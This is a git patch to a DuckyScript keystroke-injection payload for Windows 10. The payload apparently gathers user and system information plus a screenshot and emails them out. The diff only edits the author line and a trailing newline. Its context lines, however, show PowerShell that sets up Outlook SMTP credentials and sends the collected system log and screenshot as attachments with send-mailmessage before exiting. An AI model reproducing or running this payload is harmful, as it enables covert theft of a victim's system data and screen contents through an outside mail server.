From 6cb86a17855b08e01084541f72896cf13b20cef8 Mon Sep 17 00:00:00 2001 From: beigeworm <93350544+beigeworm@users.noreply.github.com> Date: Wed, 10 May 2023 12:56:34 +0000 Subject: [PATCH] Update Email System Info with Screenshot.txt --- OSINT/Email System Info with Screenshot.txt | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/OSINT/Email System Info with Screenshot.txt b/OSINT/Email System Info with Screenshot.txt index 4aa9f42..97183a7 100644 --- a/OSINT/Email System Info with Screenshot.txt +++ b/OSINT/Email System Info with Screenshot.txt @@ -1,5 +1,5 @@ REM Title: Email System & User Information -REM Author: @beigeworm +REM Author: @beigeworm | https://github.com/beigeworm REM Description: Uses Powershell to gather user and system information and send to an Email. REM Target: Windows 10 @@ -58,4 +58,4 @@ STRING ;$smtp = "smtp.outlook.com";$prt = "587";$cdtl = new-object Management.Au STRING ;$time = Get-Date;$ct = $time.addminutes($lost) STRING ;send-mailmessage -from $email -to $email -subject $subj -body $body -Attachment $syslog,$scfile -smtpServer $smtp -port $prt -credential $cdtl -usessl STRING ;sleep 10;exit -ENTER \ No newline at end of file +ENTER